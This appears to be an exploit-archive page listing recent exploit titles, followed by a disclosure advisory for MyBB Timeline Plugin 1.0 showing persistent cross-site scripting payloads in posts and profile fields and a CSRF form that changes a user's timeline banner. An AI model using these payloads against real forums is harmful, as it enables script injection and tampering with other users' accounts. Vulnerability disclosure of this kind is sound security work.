
19 changes to exploits/shellcodes jQuery UI 1.12.1 - Denial of Service (DoS) Nsasoft Hardware Software Inventory 1.6.4.0 - 'multiple' Denial of Service (PoC) Solaris 10 (SPARC) - 'dtprintinfo' Local Privilege Escalation (3) Microsoft Exchange 2019 - Server-Side Request Forgery KZTech T3500V 4G LTE CPE 2.0.1 - Weak Default WiFi Password Algorithm MyBB Timeline Plugin 1.0 - Persistent Cross-Site Scripting CMSUno 1.6.2 - 'lang' Remote Code Execution (Authenticated) WordPress Plugin SuperForms 4.9 - Arbitrary File Upload Home Assistant Community Store (HACS) 1.10.0 - Directory Traversal SonicWall SSL-VPN 8.0.0.0 - 'visualdoor' Remote Code Execution (Unauthenticated) Web Based Quiz System 1.0 - 'MCQ options' Persistent Cross-Site Scripting Online Ordering System 1.0 - Arbitrary File Upload Hotel and Lodge Management System 1.0 - Remote Code Execution (Unauthenticated) CouchCMS 2.2.1 - Persistent Cross-Site Scripting Microsoft Exchange 2019 - Server-Side Request Forgery (Proxylogon) (PoC) MagpieRSS 0.72 - 'url' Command Injection CouchCMS 2.2.1 - Server-Side Request Forgery GetSimple CMS My SMTP Contact Plugin 1.1.2 - Persistent Cross-Site Scripting Montiorr 1.7.6m - Persistent Cross-Site Scripting
29 lines
No EOL
1.1 KiB
Text
29 lines
No EOL
1.1 KiB
Text
# Exploit Title: MyBB Timeline Plugin 1.0 - Cross-Site Scripting / CSRF
|
|
# Date: 1/21/2021
|
|
# Author: 0xB9
|
|
# Software Link: https://community.mybb.com/mods.php?action=view&pid=1428
|
|
# Version: 1.0
|
|
# Tested on: Windows 10
|
|
|
|
1. Description:
|
|
MyBB Timeline replaces the default MyBB user profile. This introduces cross-site scripting on user profiles & a CSRF that allows for the users timeline banner/image to be changed.
|
|
|
|
|
|
2. Proof of Concept:
|
|
|
|
~ XSS via Thread/Post ~
|
|
- Make a new thread or reply to an existing thread
|
|
- Input a payload in either the thread title or main post itself <script>alert('XSS')</script>
|
|
Payload will execute when visiting your profile.
|
|
|
|
~ XSS via Location/Bio ~
|
|
- Go to User CP -> Edit Profile
|
|
- Input a payload in the Location/Bio <script>alert('XSS')</script>
|
|
Payload will execute when visiting your profile.
|
|
|
|
~ CSRF ~
|
|
<form class="coverpicForm" action="http://localhost/mybb/timeline.php?action=profile&uid=1" style="display: block;">
|
|
<input type="text" name="coverpic" placeholder="Add Image URL" required="">
|
|
<input type="hidden" name="do_coverpic" value="change">
|
|
<input type="submit" value="Change">
|
|
</form> |